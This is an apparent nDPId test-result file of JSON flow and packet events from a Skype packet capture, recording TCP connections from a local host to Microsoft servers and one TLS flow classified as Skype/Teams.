-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1431969698797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969698797,"pkt":"0NQSxnP1PBXCt3IOCABFAABASetAAEAG9Y7AqAEiF84hpsOqAbtGC\/RmAAAAALAC\/\/+XCwAAAgQFtAEDAwUBAQgKPiNmuAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":2,"flow_last_seen":1431969698840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969698840,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w6oZSGV1Rgv0Z6ASOJDhugAAAgQFrAQCCArsLyLPPiNmuAEDAwU="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":3,"flow_last_seen":1431969698840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969698840,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ZSJAAEAG2mPAqAEiF84hpsOqAbtGC\/RnGUhldoAQECw4twAAAQEICj4jZuLsLyLP"} -00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1357,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969698797,"flow_last_seen":1431969698841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431969698841,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969699142,"flow_last_seen":1431969699142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969699142,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431969699142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969699142,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQstAAEAGrVjAqAEinTfrksOrAbuMrH5PAAAAALAC\/\/911AAAAgQFtAEDAwUBAQgKPiNoDgAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1360,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1431969699217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969699217,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIgG7w6sASTQ1jKx+UKASOJCu2QAAAgQFrAQCCApMXR6HPiNoDgEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1361,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":3,"flow_last_seen":1431969699217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969699217,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ol1AAEAGTdLAqAEinTfrksOrAbuMrH5QAEk0NoAQECwFuQAAAQEICj4jaFlMXR6H"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1367,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969699577,"flow_last_seen":1431969699577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969699577,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50092,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1431969699577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969699577,"pkt":"0NQSxnP1PBXCt3IOCABFAABAuMZAAEAGoFTAqAEinTeCm8OsnFQhlXAyAAAAALAC\/\/+7tgAAAgQFtAEDAwUBAQgKPiNpvQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1371,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":2,"flow_last_seen":1431969699706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969699706,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYh+dN4KbwKgBIpxUw6wV0QgaIZVwM6ASOJCGcAAAAgQFrAQCCApOs6EPPiNpvQEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1372,"source":"skype.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":3,"flow_last_seen":1431969699706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969699706,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0BLVAAEAGVHLAqAEinTeCm8OsnFQhlXAzFdEIG4AQECzdGQAAAQEICj4jaj5Os6EP"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1390,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969701181,"flow_last_seen":1431969701181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969701181,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":50094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1390,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1431969701181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969701181,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1hBAAEAGgwrAqAEinTeCm8OuAbux\/OLXAAAAALAC\/\/9NAwAAAgQFtAEDAwUBAQgKPiNv+wAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1431969701308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969701308,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYh+dN4KbwKgBIgG7w655m4Wssfzi2KASOJA0zwAAAgQFrAQCCApOs6KgPiNv+wEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"skype.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1431969701308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969701308,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0yA5AAEAGkRjAqAEinTeCm8OuAbux\/OLYeZuFrYAQECyLfQAAAQEICj4jcHdOs6Kg"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969704663,"flow_last_seen":1431969704663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969704663,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50096,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1431969704663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969704663,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjY9AAEAGMVPAqAEib91KLsOwnFtwFABlAAAAALAC\/\/8u+gAAAgQFtAEDAwUBAQgKPiN9hAAAAAAEAgAA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1462,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969704664,"flow_last_seen":1431969704664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969704664,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50097,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1431969704664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969704664,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvDNAAEAGM9LAqAEinTfrsMOxnFbKZQg9AAAAALAC\/\/\/99wAAAgQFtAEDAwUBAQgKPiN9hAAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1463,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969704664,"flow_last_seen":1431969704664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969704664,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50098,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1431969704664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969704664,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIjNAAEAGNnTAqAEiQTffD8OynFri9dA8AAAAALAC\/\/+GBAAAAgQFtAEDAwUBAQgKPiN9hAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":2,"flow_last_seen":1431969704743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969704743,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+gmdN+uwwKgBIpxWw7HlrcetymUIPqASOJDOiAAAAgQFrAQCCApF6hSRPiN9hAEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1465,"source":"skype.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":3,"flow_last_seen":1431969704743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969704743,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0NN1AAEAGuzTAqAEinTfrsMOxnFbKZQg+5a3HroAQECwlZAAAAQEICj4jfdNF6hSR"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1467,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":1431969704794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969704794,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYatBN98PwKgBIpxaw7KHsi8C4vXQPaASOJCmxwAAAgQFrAQCCAouudI2PiN9hAEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1468,"source":"skype.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":1431969704794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969704794,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iwlAAEAGzanAqAEiQTffD8OynFri9dA9h7IvA4AQECz9cAAAAQEICj4jfgUuudI2"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1478,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":1431969704959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969704959,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOZv3UouwKgBIpxbw7DJYD8HcBQAZqASOJBMRQAAAgQFrAQCCApNhWUvPiN9hAEDAwk="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1479,"source":"skype.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1431969704959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969704959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04b5AAEAG3S\/AqAEib91KLsOwnFtwFABmyWA\/CIAQECyiSwAAAQEICj4jfqhNhWUv"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1490,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969705713,"flow_last_seen":1431969705713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969705713,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50099,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1490,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1431969705713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969705713,"pkt":"0NQSxnP1PBXCt3IOCABFAABAO5ZAAEAG5a3AqAEiQAQXpsOznFablHTpAAAAALAC\/\/\/tRQAAAgQFtAEDAwUBAQgKPiOBlwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":1431969705916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969705916,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIpxWw7Pn2AWqm5R06qASOJA+QQAAAgQFrAQCCApMP02qPiOBlwEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"skype.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":1431969705916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969705916,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0dcVAAEAGq4rAqAEiQAQXpsOznFablHTq59gFq4AQECyUoQAAAQEICj4jgmFMP02q"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1501,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969706277,"flow_last_seen":1431969706277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969706277,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1431969706277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969706277,"pkt":"0NQSxnP1PBXCt3IOCABFAABALAFAAEAGkuHAqAEib91KLsO0AbvHHCHtAAAAALAC\/\/9KwwAAAgQFtAEDAwUBAQgKPiODxwAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1502,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969706277,"flow_last_seen":1431969706277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969706277,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":50101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1502,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1431969706277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969706277,"pkt":"0NQSxnP1PBXCt3IOCABFAABApn5AAEAGSYfAqAEinTfrsMO1AbsGcnDPAAAAALAC\/\/\/trQAAAgQFtAEDAwUBAQgKPiODxwAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1503,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969706277,"flow_last_seen":1431969706277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969706277,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":50102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1431969706277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969706277,"pkt":"0NQSxnP1PBXCt3IOCABFAABAkWpAAEAGxzzAqAEiQTffD8O2Abu4rlNDAAAAALAC\/\/\/BnQAAAgQFtAEDAwUBAQgKPiODxwAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1505,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":1431969706353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969706353,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+gmdN+uwwKgBIgG7w7Xvxq\/pBnJw0KASOJDKVgAAAgQFrAQCCApF6hYkPiODxwEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1506,"source":"skype.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":3,"flow_last_seen":1431969706354,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969706354,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0l01AAEAGWMTAqAEinTfrsMO1AbsGcnDQ78av6oAQECwhNQAAAQEICj4jhBNF6hYk"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1508,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":1431969706407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969706407,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYatBN98PwKgBIgG7w7bIenZGuK5TRKASOJBYwQAAAgQFrAQCCAouudPJPiODxwEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1509,"source":"skype.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":1431969706408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969706408,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0IiZAAEAGNo3AqAEiQTffD8O2Abu4rlNEyHp2R4AQECyvaQAAAQEICj4jhEkuudPJ"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":1431969706572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969706572,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOZv3UouwKgBIgG7w7R3epf\/xxwh7qASOJBfaQAAAgQFrAQCCApNhWbCPiODxwEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":1431969706572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969706572,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CZNAAEAGtVvAqAEib91KLsO0AbvHHCHud3qYAIAQECy1bQAAAQEICj4jhO1NhWbC"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1528,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969707326,"flow_last_seen":1431969707326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969707326,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1431969707326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969707326,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1ORAAEAGTF\/AqAEiQAQXpsO3Abu4qWeDAAAAALAC\/\/9x6QAAAgQFtAEDAwUBAQgKPiOH3AAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":1431969707546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969707546,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIgG7w7ccEsw5uKlnhKASOJDGigAAAgQFrAQCCApMP087PiOH3AEDAwk="} 